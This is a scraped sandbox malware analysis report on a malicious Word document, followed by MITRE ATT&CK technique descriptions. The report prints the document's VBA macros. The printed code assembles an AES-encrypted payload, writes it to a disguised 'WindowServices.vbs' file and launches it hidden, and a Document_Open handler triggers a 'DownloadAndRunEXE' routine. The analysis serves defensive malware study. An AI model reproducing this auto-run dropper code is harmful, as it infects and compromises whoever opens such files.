35	part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
36	part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
37	part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
38	part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
39	part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
40	part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
41	part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
42	part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
43	part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
44	part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
45	Dim encryptedText as String
46	encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
47	decryptedText = AesDecryptString(encryptedText, key)
50	chunkSize = 3000
51	Dim outputFilePath as String
53	vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"	Environ
56	Open vbsFilePath For Output As # 1	Open
57	For i = 1 To Len(decryptedText) Step chunkSize	Len
58	partText = Mid(decryptedText, i, chunkSize)	Mid
59	Print # 1, partText
60	Next i	Len
61	Close # 1
63	Dim shell as Object
64	Set shell = CreateObject("Shell.Application")	CreateObject
67	shell.ShellExecute vbsFilePath, "", "", "open", 0	ShellExecute
71	End Sub

Subroutine
Class_InitializeAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
73	Private Sub Class_Initialize()
75	End Sub

Module: ksksksksksksks

Declaration

Line	Content
1	Attribute VB_Name = "ksksksksksksks"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Non-Executed Functions

Subroutine
Document_OpenAPIs: 3, Strings: 1, Number of lines: 3, Relevance: 8.753

APIs	Meta Information
OnTime
Now
TimeValue

Strings	Decrypted Strings
"DownloadAndRunEXE"

Line	Instruction	Meta Information
9	Private Sub Document_Open()
10	Application.OnTime Now + TimeValue("00:00:01"), "DownloadAndRunEXE"	OnTime Now TimeValue
11	End Sub

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.
Tactics:	Defense Evasion
Data Sources:
Platforms:	Android, iOS
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report q9JZUaS1Gy.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DFB794519ECD0ECC29.TMP

C:\Users\user\Desktop\~$JZUaS1Gy.doc

Static File Info

General

File Icon

Static OLE Info

General

OLE File "q9JZUaS1Gy.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 1128

General

VBA Code

VBA File Name: Module2.bas, Stream Size: 4972

General

VBA Code

VBA File Name: Module3.bas, Stream Size: 48244

General

VBA Code

VBA File Name: ViewSession.cls, Stream Size: 11978

General

VBA Code

VBA File Name: ksksksksksksks.cls, Stream Size: 1441

Windows Analysis Report
q9JZUaS1Gy.doc